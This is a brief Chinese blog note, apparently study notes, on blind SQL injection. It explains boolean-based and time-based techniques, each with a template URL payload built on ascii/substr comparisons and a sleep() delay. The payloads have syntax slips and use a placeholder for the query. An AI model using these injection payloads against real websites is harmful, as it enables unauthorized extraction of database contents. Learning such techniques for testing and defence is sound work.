盲注
盲注背景:页面没有报错回显,不知道数据库具体的返回值
1、布尔盲注:
使用情况:页面显示真假两种情况
? id=1' and ascii(substr(select查询语句)1,1)>100 --+
2、时间盲注
使用情况:页面没有任何回显
? id=1' and if(ascii(substr(select查询语句)1,1)>100,sleep(0),sleep(3)) --+
本文作者:ugnfc
本文链接:https://www.cnblogs.com/ugnfc/p/18153525
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步